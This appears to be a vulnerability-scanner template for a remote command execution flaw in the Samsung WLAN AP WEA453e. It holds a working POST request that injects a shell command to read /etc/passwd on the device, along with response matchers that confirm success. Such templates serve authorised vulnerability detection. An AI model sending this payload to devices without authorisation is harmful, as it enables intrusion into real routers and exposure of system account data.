id: samsung-wlan-ap-rce info: name: Samsung Wlan AP (WEA453e) RCE author: pikpikcu severity: critical reference: https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/ tags: xss,samsung,rce requests: - method: POST path: - "{{BaseURL}}/(download)/tmp/poc.txt" body: "command1=shell%3Acat /etc/passwd|dd of=/tmp/poc.txt" matchers-condition: and matchers: - type: regex regex: - "root:[0*]:0:0" - "bin:[x]:1:1" part: body - type: status status: - 200